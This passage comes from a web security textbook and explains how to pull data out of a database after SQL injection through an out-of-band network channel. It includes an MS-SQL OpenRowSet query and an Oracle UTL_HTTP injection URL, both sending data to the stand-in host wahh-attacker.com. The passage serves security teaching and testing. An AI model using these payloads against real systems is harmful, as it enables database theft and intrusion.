The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

query cannot be directly retrieved. Again, you need a means of retrieving the

lost results of your injected query.

One method for retrieving data that is often effective in this situation is to

use an out-of-band channel. Having achieved the ability to execute arbitrary

SQL statements within the database, it is often possible to leverage some of the

database’s built-in functionality to create a network connection back to your

own computer, over which you can transmit arbitrary data that you have gath-

ered from the database.

The means of creating a suitable network connection are highly database-

dependent, and different methods may or may not be available given the priv-

ilege level of the database user with which the application is accessing the

database. Some of the most common and effective techniques for each type of

database are described here.

MS-SQL

The 

OpenRowSet

command can be used to open a connection to an external

database and insert arbitrary data into it. For example, the following query

will cause the target database to open a connection to the attacker’s database

and insert the version string of the target database into the table called 

foo

:

insert into openrowset(‘SQLOLEDB’,

‘DRIVER={SQL Server};SERVER=wahh-attacker.com,80;UID=sa;PWD=letmein’,

‘select * from foo’) values (@@version)

Note that you can specify port 80, or any other likely value, to increase your

chance of making an outbound connection through any firewalls.

Oracle

Oracle contains a large amount of default functionality that is accessible by

low-privileged users and can be used to create an out-of-band connection.

The 

UTL_HTTP

package can be used to make arbitrary HTTP requests to other

hosts. 

UTL_HTTP

contains rich functionality and supports proxy servers, cook-

ies, redirects, and authentication. This means that an attacker who has com-

promised a database on a highly restricted internal corporate network may be

able to leverage a corporate proxy to initiate outbound connections to the

Internet.

In the following example, 

UTL_HTTP

is used to transmit the results of an

injected query to a server controlled by the attacker:

https://wahh-app.com/employees.asp?EmpNo=7521’||UTL_HTTP.request

(‘wahh-attacker.com:80/‘||(SELECT%20username%20FROM%20all_

users%20WHERE%20ROWNUM%3d1))--

Download 5,76 Mb.

Do'stlaringiz bilan baham: